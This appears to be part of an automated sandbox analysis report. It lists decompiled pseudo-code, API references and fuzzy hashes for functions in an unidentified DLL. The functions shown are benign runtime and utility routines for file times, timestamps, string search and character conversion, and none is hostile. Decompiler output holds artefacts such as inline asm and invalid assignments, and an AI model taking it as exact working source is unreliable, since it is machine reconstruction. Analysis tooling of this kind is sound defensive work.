• Instruction Fuzzy Hash: 6D21FC75E10208ABEB00CFD4C898FEEB7B9FF48704F108548E514BB290D7B59A45CBA5
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 93%
			E1001F3D0(char* _a4) {
				struct _SYSTEMTIME _v20;
				struct _SECURITY_ATTRIBUTES* _v24;
				struct _SECURITY_ATTRIBUTES* _v28;
				struct _FILETIME _v36;
				struct _FILETIME _v44;
				struct _FILETIME _v52;
				struct _FILETIME _v60;
				void* _v64;
				struct _SECURITY_ATTRIBUTES* _t44;

				_v28 = 0;
				_v24 = 0;
				if(PathFileExistsA(_a4) != 0) {
					// GENERIC_READ, FILE_SHARE_READ, OPEN_EXISTING, FILE_FLAG_BACKUP_SEMANTICS (0x2000000, so directories can be opened too)
					_v64 = CreateFileA(_a4, 0x80000000, 1, 0, 3, 0x2000000, 0);
					// GetFileTime fills creation (_v36), last-access (_v44) and last-write (_v52) times
					if(_v64 != 0xffffffff && GetFileTime(_v64,  &_v36,  &_v44,  &_v52) != 0) {
						// 0x7b2 = 1970: build the Unix epoch (1970-01-01 00:00:00) as a FILETIME in _v60
						_v20.wYear = 0x7b2;
						_v20.wMonth = 1;
						_v20.wDay = 1;
						_v20.wHour = 0;
						_v20.wMinute = 0;
						_v20.wSecond = 0;
						_v20.wMilliseconds = 0;
						SystemTimeToFileTime( &_v20,  &_v60);
						_t44 = _v36.dwLowDateTime - _v60.dwLowDateTime;
						asm("sbb eax, [ebp-0x34]");
						// 64-bit (creation time - epoch) / 0x2710 (10000), E1000F290 being __aulldiv:
						// converts 100 ns FILETIME units to milliseconds since the Unix epoch
						_v28 = E1000F290(_t44, _v36.dwHighDateTime, 0x2710, 0);
						_v24 = _t44;
					}
				}
				return _v28;
			}


APIs
• PathFileExistsA.SHLWAPI(?), ref: 1001F3E8
• CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,02000000,00000000), ref: 1001F40C
• GetFileTime.KERNEL32(000000FF,?,?,?), ref: 1001F42B
• SystemTimeToFileTime.KERNEL32(000007B2,?), ref: 1001F467
• __aulldiv.LIBCMT ref: 1001F482
Memory Dump Source
• Source File: 00000004.00000002.389655641.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
• Associated: 00000004.00000002.389597489.0000000010000000.00000004.00000001.sdmp
• Associated: 00000004.00000002.389720562.0000000010023000.00000002.00000001.sdmp
• Associated: 00000004.00000002.390103749.0000000010332000.00000004.00000001.sdmp
• Associated: 00000004.00000002.390114476.0000000010337000.00000002.00000001.sdmp
• Associated: 00000004.00000002.390121768.0000000010338000.00000004.00000001.sdmp
Similarity
• API ID: File$Time$CreateExistsPathSystem__aulldiv
• String ID:
• API String ID: 3038978132-0
• Opcode ID: e720a0e6c976b777c225cc2672a2eaa0af2df3213120956698ec805836ce489b
• Instruction ID: 94f5442095f36b7f33c28a28e912268f677076f0b3d524be3b20220ad1e1facd
• Opcode Fuzzy Hash: e720a0e6c976b777c225cc2672a2eaa0af2df3213120956698ec805836ce489b
• Instruction Fuzzy Hash: 9A21E875A10208ABEB00DFD4D899FEEB7B8EF08704F108608E505BB290D775A685CBA5
Uniqueness
Uniqueness Score: -1.00%

                                                                                                                                                C-Code - Quality: 100%
                                                                                                                                                			E10019330(void* __ebx, void* __edi, void* __eflags, intOrPtr _a4, intOrPtr _a8) {
                                                                                                                                                				intOrPtr _v8;
                                                                                                                                                				intOrPtr _v12;
                                                                                                                                                				void* _t17;
                                                                                                                                                				void* _t18;
                                                                                                                                                				void* _t19;
                                                                                                                                                				void* _t21;
                                                                                                                                                				void* _t25;
                                                                                                                                                				void* _t30;
                                                                                                                                                				void* _t38;
                                                                                                                                                				void* _t42;
                                                                                                                                                				void* _t44;
                                                                                                                                                				void* _t46;
                                                                                                                                                
                                                                                                                                                				_t38 = __edi;
                                                                                                                                                				_t30 = __ebx;
                                                                                                                                                				_t17 = E1000CAC0(_a4);
                                                                                                                                                				_t18 = E1000CAC0(_a8);
                                                                                                                                                				_t44 = _t42 + 8;
                                                                                                                                                				if(_t17 >= _t18) {
                                                                                                                                                					_v8 = _a4;
                                                                                                                                                					_v12 = 0;
                                                                                                                                                					while(1) {
                                                                                                                                                						_t19 = E1000CAC0(_a8);
                                                                                                                                                						_t21 = E1000CAC0(_a4);
                                                                                                                                                						_t46 = _t44 + 8;
                                                                                                                                                						if(_t19 + _v12 > _t21) {
                                                                                                                                                							break;
                                                                                                                                                						}
                                                                                                                                                						_t25 = E1000E89F(_t30, _a8, _t38, _v8, _a8, E1000CAC0(_a8));
                                                                                                                                                						_t44 = _t46 + 0x10;
                                                                                                                                                						if(_t25 != 0) {
                                                                                                                                                							_v12 = _v12 + 1;
                                                                                                                                                							_v8 = _v8 + 1;
                                                                                                                                                							continue;
                                                                                                                                                						}
                                                                                                                                                						return 1;
                                                                                                                                                					}
                                                                                                                                                					return 0;
                                                                                                                                                				}
                                                                                                                                                				return 0;
                                                                                                                                                			}

APIs
Memory Dump Source
• Source File: 00000004.00000002.389655641.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
• Associated: 00000004.00000002.389597489.0000000010000000.00000004.00000001.sdmp
• Associated: 00000004.00000002.389720562.0000000010023000.00000002.00000001.sdmp
• Associated: 00000004.00000002.390103749.0000000010332000.00000004.00000001.sdmp
• Associated: 00000004.00000002.390114476.0000000010337000.00000002.00000001.sdmp
• Associated: 00000004.00000002.390121768.0000000010338000.00000004.00000001.sdmp
Similarity
• API ID: _strlen
• String ID:
• API String ID: 4218353326-0
• Opcode ID: 2e95c50b6762c7a11e15052646cc8f45d1bd71e23564d2a17366cbdfb9a5a65b
• Instruction ID: fd93541d7ed1397f6a851c7bfd43323bc4bd1343b06978e00cafc39966250b4e
• Opcode Fuzzy Hash: 2e95c50b6762c7a11e15052646cc8f45d1bd71e23564d2a17366cbdfb9a5a65b
• Instruction Fuzzy Hash: 571177BAE0420CE7DB10DFA8D88199E77A8DB04298F148565FD19EB345F531FF808792
Uniqueness
Uniqueness Score: -1.00%

                                                                                                                                                C-Code - Quality: 100%
                                                                                                                                                			E100196D0(void* __ebx, void* __edi, intOrPtr _a4, intOrPtr _a8) {
                                                                                                                                                				intOrPtr _v8;
                                                                                                                                                				intOrPtr _v12;
                                                                                                                                                				void* _t20;
                                                                                                                                                				void* _t21;
                                                                                                                                                				void* _t23;
                                                                                                                                                				void* _t24;
                                                                                                                                                				void* _t27;
                                                                                                                                                				void* _t28;
                                                                                                                                                				void* _t36;
                                                                                                                                                				void* _t40;
                                                                                                                                                				void* _t42;
                                                                                                                                                				void* _t44;
                                                                                                                                                
                                                                                                                                                				_t36 = __edi;
                                                                                                                                                				_t28 = __ebx;
                                                                                                                                                				_v8 = 0;
                                                                                                                                                				if(_a4 != 0 && _a8 != 0) {
                                                                                                                                                					_t20 = E1000CAC0(_a4);
                                                                                                                                                					_t21 = E1000CAC0(_a8);
                                                                                                                                                					_t42 = _t40 + 8;
                                                                                                                                                					if(_t20 >= _t21) {
                                                                                                                                                						_v12 = 0;
                                                                                                                                                						while(1) {
                                                                                                                                                							_t23 = E1000CAC0(_a4);
                                                                                                                                                							_t24 = E1000CAC0(_a8);
                                                                                                                                                							_t44 = _t42 + 8;
                                                                                                                                                							if(_v12 >= _t23 - _t24) {
                                                                                                                                                								goto L9;
                                                                                                                                                							}
                                                                                                                                                							_t27 = E1000E89F(_t28, _a8, _t36, _a4 + _v12, _a8, E1000CAC0(_a8));
                                                                                                                                                							_t42 = _t44 + 0x10;
                                                                                                                                                							if(_t27 != 0) {
                                                                                                                                                								_v12 = _v12 + 1;
                                                                                                                                                								continue;
                                                                                                                                                							} else {
                                                                                                                                                								_v8 = 1;
                                                                                                                                                							}
                                                                                                                                                							goto L9;
                                                                                                                                                						}
                                                                                                                                                					}
                                                                                                                                                				}
                                                                                                                                                				L9:
                                                                                                                                                				return _v8;
                                                                                                                                                			}

APIs
Memory Dump Source
• Source File: 00000004.00000002.389655641.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
• Associated: 00000004.00000002.389597489.0000000010000000.00000004.00000001.sdmp
• Associated: 00000004.00000002.389720562.0000000010023000.00000002.00000001.sdmp
• Associated: 00000004.00000002.390103749.0000000010332000.00000004.00000001.sdmp
• Associated: 00000004.00000002.390114476.0000000010337000.00000002.00000001.sdmp
• Associated: 00000004.00000002.390121768.0000000010338000.00000004.00000001.sdmp
Similarity
• API ID: _strlen
• String ID:
• API String ID: 4218353326-0
• Opcode ID: 8611dd32ed2c8444fb0f5c1ea4afab806a2b034aeaa9f588fce8cf00fcbf311d
• Instruction ID: 7552c70825ce5aa6cbe61f7ae5d70de39af72cecddf3b8ac3a80b57e73ca6885
• Opcode Fuzzy Hash: 8611dd32ed2c8444fb0f5c1ea4afab806a2b034aeaa9f588fce8cf00fcbf311d
• Instruction Fuzzy Hash: 4311ABBAD1420CEBDB14CFA4D485B9D77A4EF0428CF048165FC0A9B245E635EB84CB82
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 67%
E1000EA65(void* __ebx, void* __edi) {

	E100130A0();
	if(E100148B1(1, 0x214) != __edi) {
		_push(__esi);
		_push( *0x10332c68);
		__eax = E10013034( *0x10333820);
		__eflags = __eax;
		if(__eflags == 0) {
			_push(__esi);
			__eax = E1000CA30(__ebx, __edi, __esi, __eflags);
			goto L1;
		} else {
			_push(__edi);
			_push(__esi);
			__eax = E10013107(__ebx, __edi, __esi, __eflags);
			__eax = GetCurrentThreadId();
			__esi[1] = __esi[1] | 0xffffffff;
			 *__esi = __eax;
			0 = 1;
			__eflags = 1;
		}
	}
	return 0;
}



0x1000ea65
0x1000ea7c
0x1000ea82
0x1000ea83
0x1000ea8f
0x1000ea97
0x1000ea99
0x1000eab2
0x1000eab3
0x00000000
0x1000ea9b
0x1000ea9b
0x1000ea9c
0x1000ea9d
0x1000eaa4
0x1000eaaa
0x1000eaae
0x1000eacc
0x1000eacc
0x1000eacc
0x1000ea99
0x1000ead1

APIs
• ___set_flsgetvalue.LIBCMT ref: 1000EA65
  • Part of subcall function 100130A0: TlsGetValue.KERNEL32(100131CA), ref: 100130A6
  • Part of subcall function 100130A0: __decode_pointer.LIBCMT ref: 100130B6
  • Part of subcall function 100130A0: TlsSetValue.KERNEL32(00000000), ref: 100130C3
• __calloc_crt.LIBCMT ref: 1000EA71
  • Part of subcall function 100148B1: __calloc_impl.LIBCMT ref: 100148BF
  • Part of subcall function 100148B1: Sleep.KERNEL32(00000000,100131F0,00000001,00000214), ref: 100148D6
• __decode_pointer.LIBCMT ref: 1000EA8F
  • Part of subcall function 10013034: TlsGetValue.KERNEL32(?,100133C2,00000000,00000000,1000EAC9,00000000,?,?,00000001,?,?,1000EB2D,00000001,?,?,10330250), ref: 10013041
  • Part of subcall function 10013034: TlsGetValue.KERNEL32(00000005,?,100133C2,00000000,00000000,1000EAC9,00000000,?,?,00000001,?,?,1000EB2D,00000001), ref: 10013058
• __initptd.LIBCMT ref: 1000EA9D
  • Part of subcall function 10013107: GetModuleHandleA.KERNEL32(KERNEL32.DLL,10330350,0000000C,10013219,00000000,00000000), ref: 10013118
  • Part of subcall function 10013107: GetProcAddress.KERNEL32(00000000,EncodePointer), ref: 10013141
  • Part of subcall function 10013107: GetProcAddress.KERNEL32(?,DecodePointer), ref: 10013151
  • Part of subcall function 10013107: InterlockedIncrement.KERNEL32(10332650), ref: 10013173
  • Part of subcall function 10013107: ___addlocaleref.LIBCMT ref: 1001319A
• GetCurrentThreadId.KERNEL32 ref: 1000EAA4
Memory Dump Source
• Source File: 00000004.00000002.389655641.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
• Associated: 00000004.00000002.389597489.0000000010000000.00000004.00000001.sdmp
• Associated: 00000004.00000002.389720562.0000000010023000.00000002.00000001.sdmp
• Associated: 00000004.00000002.390103749.0000000010332000.00000004.00000001.sdmp
• Associated: 00000004.00000002.390114476.0000000010337000.00000002.00000001.sdmp
• Associated: 00000004.00000002.390121768.0000000010338000.00000004.00000001.sdmp
Similarity
• API ID: Value$AddressProc__decode_pointer$CurrentHandleIncrementInterlockedModuleSleepThread___addlocaleref___set_flsgetvalue__calloc_crt__calloc_impl__initptd
• String ID:
• API String ID: 1662683381-0
• Opcode ID: 4523e30f6971cb40a2426855bbae9302a8168ff4489a0cf2ac2da806801fc158
• Instruction ID: d37afd26d2eadf3ef50fe9e24c1f066afac95630afcebaca695182ecfc570b21
• Opcode Fuzzy Hash: 4523e30f6971cb40a2426855bbae9302a8168ff4489a0cf2ac2da806801fc158
• Instruction Fuzzy Hash: 62F027373042A1ADF235F774AC4294E37C4EB8A3F1730892AF552EC0E5EE21E8808261
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 83%
E1001A740(void* __ebx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4) {
	char _v8;
	intOrPtr _v16;
	char _v279;
	char _v280;
	intOrPtr _v284;
	char _v312;
	signed int _v316;
	void* __ebp;
	void* _t27;
	intOrPtr _t52;
	void* _t55;

	_t51 = __esi;
	_t50 = __edi;
	_t37 = __ebx;
	_push(0xffffffff);
	_push(E10022AB3);
	_push( *[fs:0x0]);
	 *[fs:0x0] = _t52;
	_v316 = 0;
	E10001160( &_v312, __eflags, 0x10024c8f);
	_v8 = 0;
	_v280 = 0;
	E1000CF20(__edi,  &_v279, 0, 0x103);
	E1001DC00(__ebx, _t50, __esi,  &_v280);
	_t46 =  &_v280;
	_t27 = E1000CAC0( &_v280);
	_t55 = _t52 - 0x12c + 0x10;
	_t59 = _t27;
	if(_t27 == 0) {
		E1000D8A3( &_v280,  &_v280, 0x104, "unknown err");
		_t55 = _t55 + 0xc;
	}
	_v284 = E1001A480(_t37, _t46, _t50, _t51, _t59,  &_v280);
	E100011C0( &_v312, _v284);
	_push(_v284);
	E1000CA30(_t37, _t50, _t51, _t59);
	E10001110(_a4, _t59,  &_v312);
	_v316 = _v316 | 0x00000001;
	_v8 = 0xffffffff;
	E100011A0( &_v312);
	 *[fs:0x0] = _v16;
	return _a4;
}

0x1001a740
0x1001a740
0x1001a740
0x1001a743
0x1001a745
0x1001a750
0x1001a751
0x1001a75e
0x1001a773
0x1001a778
0x1001a77f
0x1001a794
0x1001a7a3
0x1001a7a8
0x1001a7af
0x1001a7b4
0x1001a7b7
0x1001a7b9
0x1001a7cc
0x1001a7d1
0x1001a7d1
0x1001a7e3
0x1001a7f6
0x1001a801
0x1001a802
0x1001a814
0x1001a822
0x1001a828
0x1001a835
0x1001a840
0x1001a84a

APIs
• _memset.LIBCMT ref: 1001A794
  • Part of subcall function 1001DC00: _memset.LIBCMT ref: 1001DC28
  • Part of subcall function 1001DC00: _memset.LIBCMT ref: 1001DC45
  • Part of subcall function 1001DC00: _memset.LIBCMT ref: 1001DC5B
  • Part of subcall function 1001DC00: GetVersionExW.KERNEL32(00000114), ref: 1001DC74
  • Part of subcall function 1001DC00: _strcpy_s.LIBCMT ref: 1001DDA9
• _strlen.LIBCMT ref: 1001A7AF
• _strcpy_s.LIBCMT ref: 1001A7CC
Strings
Memory Dump Source
• Source File: 00000004.00000002.389655641.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
• Associated: 00000004.00000002.389597489.0000000010000000.00000004.00000001.sdmp
• Associated: 00000004.00000002.389720562.0000000010023000.00000002.00000001.sdmp
• Associated: 00000004.00000002.390103749.0000000010332000.00000004.00000001.sdmp
• Associated: 00000004.00000002.390114476.0000000010337000.00000002.00000001.sdmp
• Associated: 00000004.00000002.390121768.0000000010338000.00000004.00000001.sdmp
Similarity
• API ID: _memset$_strcpy_s$Version_strlen
• String ID: unknown err
• API String ID: 3541540748-813478822
• Opcode ID: dd71c00dc3e889e3b8e1fcdb10f070c2db9be79ce23929b4c0d2ec3d363c14be
• Instruction ID: 908e89cf5b9352ff889f1a9c3fa8eeef98413c65ec874cc1b061f0950b8e6722
• Opcode Fuzzy Hash: dd71c00dc3e889e3b8e1fcdb10f070c2db9be79ce23929b4c0d2ec3d363c14be
• Instruction Fuzzy Hash: 6F214FB5C0021CABDB28DB54DD82BD9B774EB04754F4041D4B609A7285EB74BB84CFD2
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 100%
/* Structure matches the MSVC CRT _mbtowc_l(wchar_t *pwc, const char *s, size_t n, _locale_t loc):
 * _a4 = pwc, _a8 = s, _a12 = n, _a16 = locale. E1000D4F5 is the _LocaleUpdate constructor
 * (_v20 receives the threadlocinfo pointer: +0x4 = lc_codepage, +0x14 = lc_handle[LC_CTYPE],
 * +0xac = mb_cur_max), E10013A1A is _isleadbyte_l, E1000F720 is _errno and 0x2a is EILSEQ.
 * The "_v8 != 0" blocks before each return are the inlined _LocaleUpdate destructor.
 * This is statically linked CRT code rather than logic specific to the sample. */
E1001815A(void* __edi, short* _a4, char* _a8, intOrPtr _a12, intOrPtr _a16) {
	char _v8;
	signed int _v12;
	char _v20;
	char _t43;
	char _t46;
	signed int _t53;
	signed int _t54;
	intOrPtr _t56;
	intOrPtr _t57;
	int _t58;
	signed short* _t59;
	short* _t60;
	int _t65;
	char* _t72;

	_t72 = _a8;
	if(_t72 == 0 || _a12 == 0) {
		L5:
		return 0; /* NULL source or zero count: nothing consumed */
	} else {
		if( *_t72 != 0) {
			E1000D4F5( &_v20, __edi, _a16); /* _LocaleUpdate: resolve the locale to use */
			_t43 = _v20;
			__eflags =  *(_t43 + 0x14);
			if( *(_t43 + 0x14) != 0) { /* lc_handle[LC_CTYPE] set, i.e. not the "C" locale */
				_t46 = E10013A1A( *_t72 & 0x000000ff,  &_v20); /* _isleadbyte_l(*s) */
				__eflags = _t46;
				if(_t46 == 0) {
					__eflags = _a4;
					_t40 = _v20 + 4; // 0x840ffff8
					/* single byte: MultiByteToWideChar(lc_codepage, MB_PRECOMPOSED | MB_ERR_INVALID_CHARS, s, 1, pwc, pwc ? 1 : 0) */
					__eflags = MultiByteToWideChar( *_t40, 9, _t72, 1, _a4, 0 | _a4 != 0x00000000);
					if(__eflags != 0) {
						L10:
						__eflags = _v8;
						if(_v8 != 0) {
							_t53 = _v12;
							_t11 = _t53 + 0x70;
							 *_t11 =  *(_t53 + 0x70) & 0xfffffffd;
							__eflags =  *_t11;
						}
						return 1; /* one byte consumed */
					}
					L21:
					_t54 = E1000F720(__eflags); /* _errno() */
					 *_t54 = 0x2a; /* EILSEQ */
					__eflags = _v8;
					if(_v8 != 0) {
						_t54 = _v12;
						_t33 = _t54 + 0x70;
						 *_t33 =  *(_t54 + 0x70) & 0xfffffffd;
						__eflags =  *_t33;
					}
					return _t54 | 0xffffffff; /* -1: invalid multibyte sequence */
				}
				_t56 = _v20;
				_t15 = _t56 + 0xac; // 0xa045ff98
				_t65 =  *_t15; /* mb_cur_max */
				__eflags = _t65 - 1;
				if(_t65 <= 1) {
					L17:
					_t24 = _t56 + 0xac; // 0xa045ff98
					__eflags = _a12 -  *_t24;
					if(__eflags < 0) { /* n < mb_cur_max: truncated sequence */
						goto L21;
					}
					__eflags = _t72[1];
					if(__eflags == 0) { /* lead byte followed by NUL */
						goto L21;
					}
					L19:
					__eflags = _v8;
					_t27 = _t56 + 0xac; // 0xa045ff98
					_t57 =  *_t27;
					if(_v8 == 0) {
						return _t57; /* mb_cur_max bytes consumed */
					}
					 *((intOrPtr*)(_v12 + 0x70)) =  *(_v12 + 0x70) & 0xfffffffd;
					return _t57;
				}
				__eflags = _a12 - _t65;
				if(_a12 < _t65) {
					goto L17;
				}
				__eflags = _a4;
				_t21 = _t56 + 4; // 0x840ffff8
				/* lead byte with enough input: convert mb_cur_max bytes at once */
				_t58 = MultiByteToWideChar( *_t21, 9, _t72, _t65, _a4, 0 | _a4 != 0x00000000);
				__eflags = _t58;
				_t56 = _v20;
				if(_t58 != 0) {
					goto L19;
				}
				goto L17;
			}
			_t59 = _a4;
			__eflags = _t59;
			if(_t59 != 0) {
				 *_t59 =  *_t72 & 0x000000ff; /* "C" locale: zero-extend the byte */
			}
			goto L10;
		} else {
			_t60 = _a4;
			if(_t60 != 0) {
				 *_t60 = 0; /* empty string: store L'\0' */
			}
			goto L5;
		}
	}
}

Instruction addresses for the decompiled lines of E1001815A (one per statement, in order): 0x10018162, 0x10018169, 0x1001817e, 0x00000000, 0x10018170, 0x10018172, 0x1001818a, 0x1001818f, 0x10018192, 0x10018195, 0x100181be, 0x100181c3, 0x100181c7, 0x10018248, 0x1001825a, 0x10018263, 0x10018265, 0x100181a5, 0x100181a5, 0x100181a8, 0x100181aa, 0x100181ad, 0x100181ad, 0x100181ad, 0x100181ad, 0x00000000, 0x100181b3, 0x10018227, 0x10018227, 0x1001822c, 0x10018232, 0x10018235, 0x10018237, 0x1001823a, 0x1001823a, 0x1001823a, 0x1001823a, 0x00000000, 0x1001823e, 0x100181c9, 0x100181cc, 0x100181cc, 0x100181d2, 0x100181d5, 0x100181fc, 0x100181ff, 0x100181ff, 0x10018205, 0x00000000, 0x00000000, 0x10018207, 0x1001820a, 0x00000000, 0x00000000, 0x1001820c, 0x1001820c, 0x1001820f, 0x1001820f, 0x10018215
                                                                                                                                                0x10018183
                                                                                                                                                0x10018183
                                                                                                                                                0x1001821e
                                                                                                                                                0x00000000
                                                                                                                                                0x1001821e
                                                                                                                                                0x100181d7
                                                                                                                                                0x100181da
                                                                                                                                                0x00000000
                                                                                                                                                0x00000000
                                                                                                                                                0x100181de
                                                                                                                                                0x100181ec
                                                                                                                                                0x100181ef
                                                                                                                                                0x100181f5
                                                                                                                                                0x100181f7
                                                                                                                                                0x100181fa
                                                                                                                                                0x00000000
                                                                                                                                                0x00000000
                                                                                                                                                0x00000000
                                                                                                                                                0x100181fa
                                                                                                                                                0x10018197
                                                                                                                                                0x1001819a
                                                                                                                                                0x1001819c
                                                                                                                                                0x100181a2
                                                                                                                                                0x100181a2
                                                                                                                                                0x00000000
                                                                                                                                                0x10018174
                                                                                                                                                0x10018174
                                                                                                                                                0x10018179
                                                                                                                                                0x1001817b
                                                                                                                                                0x1001817b
                                                                                                                                                0x00000000
                                                                                                                                                0x10018179
                                                                                                                                                0x10018172

APIs
• _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 1001818A
• __isleadbyte_l.LIBCMT ref: 100181BE
• MultiByteToWideChar.KERNEL32(840FFFF8,00000009,?,A045FF98,?,00000000,?,?,?,10016B7E,?,?,00000002), ref: 100181EF
• MultiByteToWideChar.KERNEL32(840FFFF8,00000009,?,00000001,?,00000000,?,?,?,10016B7E,?,?,00000002), ref: 1001825D
Memory Dump Source
• Source File: 00000004.00000002.389655641.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
• Associated: 00000004.00000002.389597489.0000000010000000.00000004.00000001.sdmp
• Associated: 00000004.00000002.389720562.0000000010023000.00000002.00000001.sdmp
• Associated: 00000004.00000002.390103749.0000000010332000.00000004.00000001.sdmp
• Associated: 00000004.00000002.390114476.0000000010337000.00000002.00000001.sdmp
• Associated: 00000004.00000002.390121768.0000000010338000.00000004.00000001.sdmp
Similarity
• API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
• String ID:
• API String ID: 3058430110-0
• Opcode ID: 5e8ca58f192645aeac23bdabe86f34e73e76cd9a67157fe0bad94941ff89931c
• Instruction ID: 8c2b7c8d3196bbd4c2d7993dcbbe5c0e1781117acee873ad45468beb87eff19f
• Opcode Fuzzy Hash: 5e8ca58f192645aeac23bdabe86f34e73e76cd9a67157fe0bad94941ff89931c
• Instruction Fuzzy Hash: 37318D32A04296FFEB11CFA4CC819AE7BE9FF02251F1585A9E4509F1A1D730DB81DB51
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 100%
			/* Converts the NUL-terminated ANSI string _a4 into a newly allocated,
			   NUL-terminated wide string: measure the input, size the output with
			   a first MultiByteToWideChar call, allocate and zero the buffer, then
			   perform the actual conversion. */
			E1001A370(void* __ebx, void* __edi, void* __esi, char* _a4) {
				int _v8;
				int _v12;
				short* _v16;

				_v16 = 0;
				_v12 = E1000CAC0(_a4);                                  // _strlen(_a4)
				_v8 = MultiByteToWideChar(0, 0, _a4, _v12, 0, 0);       // required wide-char count
				_t9 = _v8 + 2; // 0x2
				_v16 = L1000CE56(__ebx, _a4, __edi, __esi, _v8 + _t9);  // allocate 2*_v8 + 2 bytes
				_t13 = _v8 + 2; // 0x2
				E1000CF20(__edi, _v16, 0, _v8 + _t13);                  // _memset(buffer, 0, 2*_v8 + 2)
				MultiByteToWideChar(0, 0, _a4, _v12, _v16, _v8);
				_v16[_v8] = 0;                                          // wide NUL terminator
				return _v16;
			}

APIs
• _strlen.LIBCMT ref: 1001A381
• MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000), ref: 1001A39C
• _memset.LIBCMT ref: 1001A3C6
• MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000), ref: 1001A3E2
Memory Dump Source
• Source File: 00000004.00000002.389655641.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
• Associated: 00000004.00000002.389597489.0000000010000000.00000004.00000001.sdmp
• Associated: 00000004.00000002.389720562.0000000010023000.00000002.00000001.sdmp
• Associated: 00000004.00000002.390103749.0000000010332000.00000004.00000001.sdmp
• Associated: 00000004.00000002.390114476.0000000010337000.00000002.00000001.sdmp
• Associated: 00000004.00000002.390121768.0000000010338000.00000004.00000001.sdmp
Similarity
• API ID: ByteCharMultiWide$_memset_strlen
• String ID:
• API String ID: 745779501-0
• Opcode ID: bebd11029f934ca765ae3ad1a928e3e554420f3dbb80f1cb6d9ef85ef79db074
• Instruction ID: c5e182b0f3cbb216502a88be2155e7732263ea6a521cd02f1448982d76bc71fb
• Opcode Fuzzy Hash: bebd11029f934ca765ae3ad1a928e3e554420f3dbb80f1cb6d9ef85ef79db074
• Instruction Fuzzy Hash: 5311B1B9E00208FBEB14CF94D895F9EB7B5EB48704F108198F9099B385D671AA018B95
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 91%
			/* Returns the current time as a 64-bit count of milliseconds since
			   1970-01-01 00:00:00 (a Unix-style timestamp): both the epoch and the
			   current system time are converted to FILETIME (100 ns units), the
			   difference is taken, and the result is divided by 10000 (0x2710).
			   The low dword is returned in _v36, the high dword kept in _v32. */
			E1001F570() {
				struct _FILETIME _v12;
				struct _SYSTEMTIME _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				struct _SYSTEMTIME _v52;
				struct _FILETIME _v60;
				intOrPtr _t31;

				_v28.wYear = 0x7b2;                                     // 1970
				_v28.wMonth = 1;
				_v28.wDay = 1;
				_v28.wHour = 0;
				_v28.wMinute = 0;
				_v28.wSecond = 0;
				_v28.wMilliseconds = 0;
				GetSystemTime( &_v52);
				SystemTimeToFileTime( &_v52,  &_v12);                   // now, as FILETIME
				SystemTimeToFileTime( &_v28,  &_v60);                   // epoch, as FILETIME
				_t31 = _v12.dwLowDateTime - _v60.dwLowDateTime;
				asm("sbb eax, [ebp-0x34]");                             // 64-bit subtract of the high dwords
				_v36 = E1000F290(_t31, _v12.dwHighDateTime, 0x2710, 0); // __aulldiv: (now - epoch) / 10000
				_v32 = _t31;
				return _v36;
			}

APIs
• GetSystemTime.KERNEL32(?), ref: 1001F5A4
• SystemTimeToFileTime.KERNEL32(?,?), ref: 1001F5B2
• SystemTimeToFileTime.KERNEL32(000007B2,?), ref: 1001F5C0
• __aulldiv.LIBCMT ref: 1001F5DB
Memory Dump Source
• Source File: 00000004.00000002.389655641.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
• Associated: 00000004.00000002.389597489.0000000010000000.00000004.00000001.sdmp
• Associated: 00000004.00000002.389720562.0000000010023000.00000002.00000001.sdmp
• Associated: 00000004.00000002.390103749.0000000010332000.00000004.00000001.sdmp
• Associated: 00000004.00000002.390114476.0000000010337000.00000002.00000001.sdmp
• Associated: 00000004.00000002.390121768.0000000010338000.00000004.00000001.sdmp
Similarity
• API ID: Time$System$File$__aulldiv
• String ID:
• API String ID: 3735792614-0
• Opcode ID: c5081578e9fd931923cb91727b204842aed61b67563f5adf44f10d167ea8ffdf
• Instruction ID: fa02b7a9fed9572687d28a8f87146f07c02dbb090ec293c5d85fe2b1344f7672
• Opcode Fuzzy Hash: c5081578e9fd931923cb91727b204842aed61b67563f5adf44f10d167ea8ffdf
• Instruction Fuzzy Hash: 9301E575D1021DAADB00DFE4C8899EEB7B8FF04304F109649E904A7250E779A64ACBA9
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 68%
			E100026D0(void* __eflags) {
				intOrPtr _v8;
				intOrPtr _v16;
				char _v56;
				char _v84;
				void* _t14;
				intOrPtr _t20;

				/* MSVC exception-handling prolog: push the EH state, the handler
				   address and the previous SEH record, then install this frame
				   at fs:[0]. */
				_push(0xffffffff);
				_push(E10022D98);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t20;
				E10001160( &_v84, __eflags, "vector<T> too long");
                                                                                                                                                				_v8 = 0;
                                                                                                                                                				E10001E70( &_v56,  &_v84);
                                                                                                                                                				E1000EBEB( &_v56, 0x103307b8);
                                                                                                                                                				_v8 = 0xffffffff;
                                                                                                                                                				_t14 = E100011A0( &_v84);
                                                                                                                                                				 *[fs:0x0] = _v16;
                                                                                                                                                				return _t14;
                                                                                                                                                			}
APIs
• std::bad_exception::bad_exception.LIBCMTD ref: 10002706
• __CxxThrowException@8.LIBCMT ref: 10002714
  • Part of subcall function 1000EBEB: RaiseException.KERNEL32(?,?,1000CC92,100019C3,?,?,?,?,1000CC92,100019C3,10330760,103332E0), ref: 1000EC2B
Strings
Memory Dump Source
